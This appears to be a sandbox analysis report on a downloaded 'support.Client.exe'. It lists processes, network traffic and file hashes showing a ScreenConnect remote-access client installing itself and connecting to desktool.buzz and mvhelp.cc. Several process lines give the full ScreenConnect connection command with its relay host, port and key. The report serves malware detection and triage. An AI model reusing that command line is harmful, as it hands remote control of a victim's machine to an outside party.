"C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe"

C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.ClientService.exe

"C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.ClientService.exe" "?y=Guest&h=desktool.buzz&p=8041&s=50ef8fa4-9a64-466f-978c-e78b5206d7cb&k=BgIAAACkAABSU0ExAAgAAAEAAQBVXsSEc%2bx9uXD3C%2f7hA6k%2bCkYq8qNt9ddXTDuk6xtcDXcigKgagdDrv%2fcdVObs%2b5PsIEqa3J7G2KVNlw%2fruJmp5gWKLUA7CGK0M2xYP%2fnHrh8PGKb6APgX8%2bMmK%2fRI%2fuG1ObyHzrZSA2zDxqMWtbhBTbrYOR9GzyZRtT2sHBbUlx41DAcKHlRcqgqrm7UWwNY1mXMg1RfS2uCkTVjdU3GL7AKxo9LZAF%2bNZ31xMPej0IfTdjxJIuBFFPQhiLUl3MrrnM%2bcDzOJ4R5qzkEDJux1InHPO4447uQgY2C%2fpH9XXbyUJCVvgFFCPS5LSQJiQ7CvgPW3fKiAsEahrr56vu2y&r=&i=Sam%20Dan" "1"

C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.ClientService.exe

"C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.ClientService.exe" "?y=Guest&h=desktool.buzz&p=8041&s=50ef8fa4-9a64-466f-978c-e78b5206d7cb&k=BgIAAACkAABSU0ExAAgAAAEAAQBVXsSEc%2bx9uXD3C%2f7hA6k%2bCkYq8qNt9ddXTDuk6xtcDXcigKgagdDrv%2fcdVObs%2b5PsIEqa3J7G2KVNlw%2fruJmp5gWKLUA7CGK0M2xYP%2fnHrh8PGKb6APgX8%2bMmK%2fRI%2fuG1ObyHzrZSA2zDxqMWtbhBTbrYOR9GzyZRtT2sHBbUlx41DAcKHlRcqgqrm7UWwNY1mXMg1RfS2uCkTVjdU3GL7AKxo9LZAF%2bNZ31xMPej0IfTdjxJIuBFFPQhiLUl3MrrnM%2bcDzOJ4R5qzkEDJux1InHPO4447uQgY2C%2fpH9XXbyUJCVvgFFCPS5LSQJiQ7CvgPW3fKiAsEahrr56vu2y&r=&i=Sam%20Dan" "1"

C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe

"C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe" "RunRole" "e39004f1-651e-442d-96fc-edef529bc0a1" "User"

C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe

"C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe" "RunRole" "04401fb2-489e-4727-9d0f-f2d867723fb7" "System"

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\Downloads\support.Client.exe

"C:\Users\Admin\Downloads\support.Client.exe"

C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe

"C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe"

C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.ClientService.exe

"C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.ClientService.exe" "?y=Guest&h=desktool.buzz&p=8041&s=50ef8fa4-9a64-466f-978c-e78b5206d7cb&k=BgIAAACkAABSU0ExAAgAAAEAAQBVXsSEc%2bx9uXD3C%2f7hA6k%2bCkYq8qNt9ddXTDuk6xtcDXcigKgagdDrv%2fcdVObs%2b5PsIEqa3J7G2KVNlw%2fruJmp5gWKLUA7CGK0M2xYP%2fnHrh8PGKb6APgX8%2bMmK%2fRI%2fuG1ObyHzrZSA2zDxqMWtbhBTbrYOR9GzyZRtT2sHBbUlx41DAcKHlRcqgqrm7UWwNY1mXMg1RfS2uCkTVjdU3GL7AKxo9LZAF%2bNZ31xMPej0IfTdjxJIuBFFPQhiLUl3MrrnM%2bcDzOJ4R5qzkEDJux1InHPO4447uQgY2C%2fpH9XXbyUJCVvgFFCPS5LSQJiQ7CvgPW3fKiAsEahrr56vu2y&r=&i=Sam%20Dan" "1"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=3424 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=3968 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5704 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6200 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=3276 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=5776 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=3368 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 google.com udp
GB 142.250.180.14:443 google.com tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com tcp
GB 216.58.204.68:443 www.google.com udp
US 8.8.8.8:53 apis.google.com udp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 42.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 68.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 35.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
GB 142.250.187.238:443 apis.google.com tcp
US 8.8.8.8:53 content-autofill.googleapis.com udp
GB 216.58.201.106:443 content-autofill.googleapis.com tcp
US 8.8.8.8:53 238.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 106.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 consent.google.com udp
GB 216.58.213.14:443 consent.google.com tcp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 14.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 140.71.91.104.in-addr.arpa udp
US 8.8.8.8:53 180.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
GB 142.250.180.14:443 google.com udp
US 192.178.49.3:443 beacons.gcp.gvt2.com tcp
US 8.8.8.8:53 3.49.178.192.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 11.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com udp
US 8.8.8.8:53 google.com udp
US 192.178.49.3:443 beacons.gcp.gvt2.com udp
GB 142.250.180.14:443 google.com udp
US 8.8.8.8:53 beacons3.gvt2.com udp
GB 216.58.213.3:443 beacons3.gvt2.com tcp
GB 216.58.213.3:443 beacons3.gvt2.com udp
US 8.8.8.8:53 3.213.58.216.in-addr.arpa udp
GB 216.58.204.68:443 www.google.com udp
US 8.8.8.8:53 mvhelp.cc udp
DE 88.214.23.125:443 mvhelp.cc tcp
DE 88.214.23.125:443 mvhelp.cc tcp
US 8.8.8.8:53 apps.identrust.com udp
GB 96.17.179.205:80 apps.identrust.com tcp
US 8.8.8.8:53 maxcdn.bootstrapcdn.com udp
US 8.8.8.8:53 ajax.googleapis.com udp
US 104.18.11.207:443 maxcdn.bootstrapcdn.com tcp
US 104.18.11.207:443 maxcdn.bootstrapcdn.com tcp
GB 142.250.200.10:443 ajax.googleapis.com tcp
GB 142.250.200.10:443 ajax.googleapis.com udp
DE 88.214.23.125:443 mvhelp.cc tcp
DE 88.214.23.125:443 mvhelp.cc tcp
GB 216.58.201.106:443 content-autofill.googleapis.com udp
US 8.8.8.8:53 125.23.214.88.in-addr.arpa udp
US 8.8.8.8:53 205.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 207.11.18.104.in-addr.arpa udp
US 8.8.8.8:53 10.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 beacons.gvt2.com udp
GB 216.58.212.227:443 beacons.gvt2.com tcp
GB 216.58.212.227:443 beacons.gvt2.com udp
US 8.8.8.8:53 227.212.58.216.in-addr.arpa udp
DE 88.214.23.125:443 mvhelp.cc tcp
US 8.8.8.8:53 desktool.buzz udp
MD 146.19.213.114:443 desktool.buzz tcp
US 8.8.8.8:53 114.213.19.146.in-addr.arpa udp
GB 216.58.201.106:443 content-autofill.googleapis.com udp
US 8.8.8.8:53 desktool.buzz udp
MD 146.19.213.114:443 desktool.buzz tcp
MD 146.19.213.114:8041 desktool.buzz tcp
GB 216.58.204.68:443 www.google.com udp
US 8.8.8.8:53 apis.google.com udp
GB 142.250.187.238:443 apis.google.com udp
US 8.8.8.8:53 content-autofill.googleapis.com udp
GB 216.58.212.202:443 content-autofill.googleapis.com udp
US 8.8.8.8:53 202.212.58.216.in-addr.arpa udp

Files

\??\pipe\crashpad_4100_GOXLUWBMYYMMGQXV

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 7b35c8104482d12f8a1820955382a24f
SHA1 5a18a5ac801a6687347ea722ae3ec4d68879d97c
SHA256 e7079f3895c3c9d129bb89af6d0287586037e312944df15662b0fb68c87994e3
SHA512 6ce47ad2029bee1fc6b9da79e6ba1329de0d71c6d54eef839b63f2319551bfd500bb576569b085a2d05c5eeb1c2f037158f2cc1dd251432bc085e00068ae179b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 0ba5fd3141f50fb01cfde52892eb83f4
SHA1 f9ce7a6715ebde6423c71356c44a322d856d407e
SHA256 eaf01a67b4285696b0e5676af7dafb57d8e697dc8d9057bd5f82c9d2cbad5d4f
SHA512 9af83804a03d5282329ccd562d959d455278d4755602f49dc37416eb496f84582933774c351a915fe9ead970cd3a3d2d4072c54cd416231924558762707ca286

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 09c02906c6a4bc1144a25c5f33999ade
SHA1 9e65d9a955087f728ecdb5b0709d1c87d98ff017
SHA256 61164ab37f78b23cd0e33f1084822e1c4b74756535c4d9f8b3a371f4f283b933
SHA512 6f19ec24934fb860eee883e333e02ff8857fc4aee73debead494c0fa5e2c6c76f53571d07a33bdd8f21885bf4130cea7c05e397b29887525317248315157b5b5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 93ce9c29a60633a2c9dee9e09726b838
SHA1 f2a2eec8a197c5326cb9e2e26c95fff28c39d683
SHA256 87e2b0225ca95026756fa898eed2bebcd62c643126ca2f60330a1b0d653e73ed
SHA512 1c0af68bce1f992411fbf7c3c78efcd335a43cd4906f28f1020de9d34f7e6a22b5cda8dea2206ff03ee11e952444cd4eb940b6c1b665131d27cf870ecae9f288

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

MD5 6cf1011c6b998c818b26aab3897d14c3
SHA1 f03e02bbe632bc2927f5870b74132fb29f9b1342
SHA256 f7c7da961ca2508d643fefecb5467dbc04fb61d6bbfa861d934fd793184a4921
SHA512 a6b8d5e21dd276d7157ce4422c1af0862e8a5a8806e729d505a13f78e719bc305a802f2f309c808d4768b10c58d256113994d01a9cd8cb6dee1f458946303239

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe5a94ee.TMP

MD5 4c43e9e4ff09920c8bcb0cada551a8f9
SHA1 bc2e6885465edcecd195d28ab153159dd37749eb
SHA256 827e5863c6f3e168e73291ee416c62c6211e6513c5478b0a1dc380ec5f9187f3
SHA512 a0eba6bf8daa07196b545883420ecc53a2167ece261383da0c25f4777258cd617af97fcbb655218f7b8d28d383e368d1448f11cf3204889a0a5f9e26c5bbddd9

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 8ea2e105db613795f76240ae064d3f7c
SHA1 d0706a8c1ffa4819c9f893591dd9e4392a81e183
SHA256 9c153e0ac938f167ce262edf3bb5f2cc0e072ca546924e52d77f13d365be1bdd
SHA512 d4c837cc26a25c7e791346c9beaaa3925afd9fc63674e1901b071ca327c9db573d32dfdd7efebfac9eac5578fe13f715c1ad45e14773a838b1ab546cfe4e9d5c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 96dd064cf7060ebfd37d4cac25f323af
SHA1 c59925afccf954eed0f8311366d313a5b66d9c49
SHA256 d3b87f71b64d162c5b1beb96e7e8e6a2fcba4dede0491f96786bc91bde6f1e7c
SHA512 e61067e8ab45976c69dceb7224c1c0b5fb8a3ff429a7197286c701c4aebe4f1728848da0c0b341622e600daa54b5995d105766e44a070f08a1e71776431ccbff

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 05f8f03abd6a62cd1a69b3a7411c78de
SHA1 0d8bc39df70ea1b70a9b78fb2de95f2bcb049914
SHA256 93ab5062bd54e6d0f07bdda2ca924c44a45ce7b264418b6d6f086674e588da48
SHA512 877e873fd5081e3f9e9891ad45639a256fa2c61eff7d5dd1417d3f27fc85bfa38db28f1564d420f84117b305b9fb404f30543659317911f25eaca04f5834bd3d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 c1889ce8533aed5ac78dd4ac5def6eb2
SHA1 35abf509acd8d0218cc59f21f0ea822ec8c3a1d4
SHA256 fddae9de7b63bccb5c16d025d7d9a28ef29bd10c75bcd5064b8b5a37eeba212d
SHA512 337080f5e30e706b0d96a2dc9f73f1fc81e8ad1d995c9e6db5cf3ea844f51a5efd78cc8ff920c42d918ad06bb7256eb474abd583664ab05f77f955c0296a4370

C:\Users\Admin\Downloads\support.Client.exe

MD5 d6fb548747b4397c03b0fbab1174ce96
SHA1 db9ed9360437e8cdb10c7cb38824d35775b7373c
SHA256 d78fda2bd122a6714e36bf093900195d415aac8b83f752eeccf3064838fe2fdb
SHA512 7c8a0c0ff2ea650bd7e79acff5f27224fbef0f73fb90b8eba784a109e55b5c922eec39ccfd4b7fc7bae1271a2ef936e1c02b636c838d7414ffa1a594da12cfec

memory/1680-203-0x00000276C4B10000-0x00000276C4B18000-memory.dmp

memory/1680-204-0x00000276DF170000-0x00000276DF2F6000-memory.dmp

memory/1680-205-0x00007FFAB7B40000-0x00007FFAB8601000-memory.dmp

memory/1680-206-0x00000276DF0E0000-0x00000276DF0F0000-memory.dmp

memory/1680-207-0x00000276DF0E0000-0x00000276DF0F0000-memory.dmp

memory/1680-210-0x00000276E2CE0000-0x00000276E2D30000-memory.dmp

memory/1680-228-0x00000276DF0E0000-0x00000276DF0F0000-memory.dmp

memory/1680-238-0x00000276E32D0000-0x00000276E3470000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Deployment\2KBQ4KKM.AC7\YX76KAP2.QQE\ScreenConnect.Windows.dll

MD5 c38c8e82d196b53c0ef2bd5bb75b12e0
SHA1 5e7a06aa46522a6947e06d6fae78cca48e4b9118
SHA256 7e51dcaacc6ca67ba9ab6d96caf7c4b99b810bc2cfb34e420bf348b9667b15eb
SHA512 dbfd95961eb32bb00ab054d56f796425e0c53a24bfe498744c235e4c0d63e544d878d05d9d58a5fbb360a3e0de62b94a592523c80a4e67f583e7e422de83d83b

memory/1680-245-0x00000276E0730000-0x00000276E0744000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Deployment\2KBQ4KKM.AC7\YX76KAP2.QQE\ScreenConnect.ClientService.dll

MD5 b1346a9380086791abef5aa98903c80e
SHA1 ce77b0812363223bb04bfee60d383987ca405225
SHA256 43bbdb1c62d021a137e51cfb23241d3765089f98042e2a12a0b1449647290135
SHA512 a28b593bdaeb8e742d0c009cf2b7c60c8f25bccc7d824ed18e37be9b797946c3539f9fc12f0c74e6ccf28114936d77b2dd0fee6b08697c72741c4d6149f24b1d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 89608bedc36a81ab377358d21e334751
SHA1 c3a1ce6915fc6be9ec059bd1519152183d0e6c62
SHA256 fcdbab7dcb32e5020faceee213ce50431279618ab942d37960fa7b7959b24ea2
SHA512 5c82c20dfd8ecc607f89bc29c55610ca9d0e99d9b8bf8923ccd0556bce7617e902352273dec8cf3127cd340e5eabe3c28ba6baeccdc5b871e74971e2551f0e09

memory/1680-259-0x00000276E0900000-0x00000276E0990000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Deployment\2KBQ4KKM.AC7\YX76KAP2.QQE\ScreenConnect.WindowsClient.exe

MD5 254a33ec9d5391577b95d2cea3cf06d8
SHA1 a23587d95e94d7d5222b675867b3d525c2b4db5f
SHA256 6bd3ab0299b3826e476461caf1244e672d9f12858243921beb3939134618b790
SHA512 e9a7550678d11b86032869a888bef1fe75d89eb895ae561937a26a6b364fa78f5903c53ad0ee74bdb2e235baa5570b16cfa97133e060ceb3033d469f62712bb6

memory/1680-265-0x00000276E0870000-0x00000276E08A2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Deployment\2KBQ4KKM.AC7\YX76KAP2.QQE\ScreenConnect.Client.dll

MD5 32d230704c43f4bf811ce214fa23700b
SHA1 87c48d902f206c196ed6b69747f2ff1ec401a969
SHA256 3b0cd76c1d949d6d6e4073c73e637c531bac18827f9ec02a6be6c5e6bbcfe368
SHA512 cda6fbd99180f590658b47a418e28c6456dc298f14a7c1aa229a6fd97355dc6caa9278659d2d885cee1000298f54556f16ef359990d9f3b31fd01293adb8efa1

memory/1680-271-0x00000276E08F0000-0x00000276E0970000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Deployment\2KBQ4KKM.AC7\YX76KAP2.QQE\ScreenConnect.Core.dll

MD5 6c5d0928642bf37ceed295b984e05be2
SHA1 46be0d5a7db56cb1ad77274709d0db053a3c0999
SHA256 3b0c45370ca9295881ef5e9d14402c42dfb45803f54d542e6a7e595a05f365a1
SHA512 bb95297e937dcf689ea9a02f487f55bebf3d6766a0aa75ffdbc932638717e79719f88787a325550d660af5856c3620cb1c6d165bbb9af87bd74af1f30e23c19b

C:\Users\Admin\AppData\Local\Temp\Deployment\3RHX334C.DQJ\N25LJ009.M7Z.application

MD5 515f738985ec6645f0c04221a90885d4
SHA1 71394f8aa4a45309b849c9ae6968c87dca9100b9
SHA256 3694756cf7fe96f35ac9a819b605a8cae403ab4f2b63909cb6a7717914d790bb
SHA512 ad987ca3bf43540a14b41c985d745fc29733281919250acdebb0889018a0b019b98c1582c449daa91f8f8772f684a2a5ac73049ecea61cd5b3289b1d53dba1b1

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

MD5 01f73ad0f06335140474ffbb4f8e998b
SHA1 961208caf84055e1fe928c07d25b0076a49724af
SHA256 992b6c37c8dfb1fb84d24ab8259a50a1257fefa7ee0f131cf15d21fd0260467c
SHA512 262d613fd5f6491883b52a767d1c2518d60e9d259e42993a6819bb8573a101235ea09b9871bc19416edd1fe4b594703bd6d439a142a9a996d011f293f1ad10e9

C:\Users\Admin\AppData\Local\Temp\Deployment\2KBQ4KKM.AC7\YX76KAP2.QQE\ScreenConnect.WindowsClient.exe.manifest

MD5 9165412ee08839b9702bd4971864a133
SHA1 a229e0582dc95272bc15acd59b73b5b6c8c5abcd
SHA256 6bb1c1aa5663ad33eda2256037da8e7439502c206d4c0047270a2fd1f006bb50
SHA512 7b84ce7685daca320545ec6a0dd55e7f4d85bb53f58f8feb163439cc06357e17cbb4e021dd957a7af6287fe34b3379db85dd452ebe118ce4023394d5a18a62e5

C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre...exe_25b0fbb6ef7eb094_0017.0002_none_a93db4211b84e004\ScreenConnect.ClientService.exe

MD5 256081d2d140ed2727c1957317627136
SHA1 6c0b6758aef7980868e56a0739c877d4fa837ed9
SHA256 72b206d8c2ea0378f096c5e7c13022f67a0a0f670a10c1534b6f7a1ba95e8be6
SHA512 40d15bfab3fcac4c1a5f9ebf4618982f600a00659e48a8bc1e7d5223852a2b6c1f047e17d93dd5545c9d8af11f943f243392f7db44ba993345e15e106a7246f0

C:\Users\Admin\AppData\Local\Temp\Deployment\2KBQ4KKM.AC7\YX76KAP2.QQE\ScreenConnect.WindowsBackstageShell.exe

MD5 dd9d8572ac8b91f6844e9e8a28684577
SHA1 5e86a97c1c51a01766715628aa5ee965fd2948ae
SHA256 a2409879344f21a45175a17f857b4c027087200f4892810994715a189f2a6280
SHA512 c89359a6fdb4bbfa19f3d1e16e8d31bcc1e2845a7eb39427063c918cdfb9c24314c28afa4c3bc7a87879dd28dcfb7fe9cd3539366b2fbeed4f78e5dbf9e1e33b

C:\Users\Admin\AppData\Local\Temp\Deployment\2KBQ4KKM.AC7\YX76KAP2.QQE\ScreenConnect.WindowsClient.exe.config

MD5 728175e20ffbceb46760bb5e1112f38b
SHA1 2421add1f3c9c5ed9c80b339881d08ab10b340e3
SHA256 87c640d3184c17d3b446a72d5f13d643a774b4ecc7afbedfd4e8da7795ea8077
SHA512 fb9b57f4e6c04537e8fdb7cc367743c51bf2a0ad4c3c70dddab4ea0cf9ff42d5aeb9d591125e7331374f8201cebf8d0293ad934c667c1394dc63ce96933124e7

C:\Users\Admin\AppData\Local\Temp\Deployment\2KBQ4KKM.AC7\YX76KAP2.QQE\ScreenConnect.Windows.dll.genman

MD5 9a91308c9b52b96c012f0c14581d4445
SHA1 8040d311e2b073309a11a8707ef07b9d8dced891
SHA256 293e2eafed2e158baa0e2c7c855ad68618b7fef29fbc799aa0bdf551e2c93300
SHA512 927af7affc50c8662ab140621841ec1eec07f47a51e3a590632e6977d69154c9e3d7c020754629b63b46116bb9f05cd2c38e1173879e4365f5d04751ea64941a

C:\Users\Admin\AppData\Local\Temp\Deployment\2KBQ4KKM.AC7\YX76KAP2.QQE\ScreenConnect.ClientService.dll.genman

MD5 5ff58a84f45fb37155ad9506016e01e0
SHA1 21ad04df12e2620c71d4c389e82052d1dbe1eb89
SHA256 19793a0f7348c3ad051e370d3af533fe2d105b2187eaeab9bce49be9ac77c8d7
SHA512 26569b4058ef274e96bc327b8199b16a50883d92f3a5a63904e1c890e33de0838908565951371cd3388c8ed5920e989a1907d6e0b37d803299fb5be90abb796d

C:\Users\Admin\AppData\Local\Temp\Deployment\2KBQ4KKM.AC7\YX76KAP2.QQE\ScreenConnect.WindowsClient.exe.genman

MD5 3f462b9b4d5ae0d9928a86cc95e30e95
SHA1 ab9914088776994af9df487be0453af0b825a93a
SHA256 b08049bd6006e44ec8ecb301cfde944ca29572a783cb8aee59a0accef2e9bab4
SHA512 2e1ff89dbae65e48aaf79f1e239265254a45ddf725559d078a40b59dea07f177887caa2d17d80506ac55447852e5d86863457970550b21ba884acd0f71e8957a

C:\Users\Admin\AppData\Local\Temp\Deployment\2KBQ4KKM.AC7\YX76KAP2.QQE\ScreenConnect.Client.dll.genman

MD5 9f03e9009c7e7501e7eb2d4b11e03659
SHA1 cbb55994291a061e4dc15905436340a37f0ead40
SHA256 cb49febfd0fd89f843f7d44d64fbfd94dd23d71a19cd19a24453799d2e830a89
SHA512 e623f8f8a98c689b9a05f0e90a5fa7ac118784a2bdff7e19e1c68f65dcac7d5fb41c3ea490e132e01c02fd7603a68813e2230e0f2105c0a74fc85cfbc1ddad6d

C:\Users\Admin\AppData\Local\Temp\Deployment\2KBQ4KKM.AC7\YX76KAP2.QQE\ScreenConnect.Core.dll.genman

MD5 adb6ed2710265b25f4e7e75c16fed3e3
SHA1 e86dd1f9ccee017a811bb4ca0d287ef62c9ec876
SHA256 823258438816ec648dcb31d800c1b085a303b85c2c2f43dbbf7958949e1db8f9
SHA512 9265c8e89a4db1902ac6b2ec2d50ed9226976278aef0cbfe38c7c3fe8d30cf2d76b235b6f4931837af4d47ed584ea4baaf380d88a33a7c5beee9f5fb2bb18a04

C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\manifests\scre...exe_25b0fbb6ef7eb094_0017.0002_none_a93db4211b84e004.cdf-ms

MD5 faa4a60914983ad74e62539d0668825c
SHA1 525d0cbe4a1ab4db014fa25a8fc21d62cffc629b
SHA256 b702983fe122dc6f95270c5f3f7fda6d917d639686448aeea48b7e96e2660b60
SHA512 a3df47bfce981c53516d1b582618110dcb8ef1f492a4c08d00b16e2b645f12a280d6eab520822c6418173aa42eefb4eca51aebc425f92743d10d1de36b9ef717

C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\manifests\scre..tion_25b0fbb6ef7eb094_0017.0002_none_4a31edb78203a9e7.cdf-ms

MD5 ebb9020b8d60729065639ccb0243565b
SHA1 1c8a40ee15bc87d7085533ed134f546f8aa72daf
SHA256 7878f0798c2565f229ad173e57da47f8cb6252f3a8fcef708b1f29aa23d67310
SHA512 62fd14adb628182e65606720ae0ace7777ba0f7b242141cf5965fb8a21b7b236e503377b6ed7f55d966653450eebe21c6270ef9e761f8b0b98bb99ac5d5d83f3

C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\manifests\scre..vice_4b14c015c87c1ad8_0017.0002_none_15faadf56d0f44e3.cdf-ms

MD5 276deb36e34cf0c7a09197c3d7069db9
SHA1 4708db90bd5110efacc4c59fef5d06fa05436b29
SHA256 231c0664cbb738170437f3aa88ab5030e3bd2f7ac6c2862a2d957a3b6da8184e
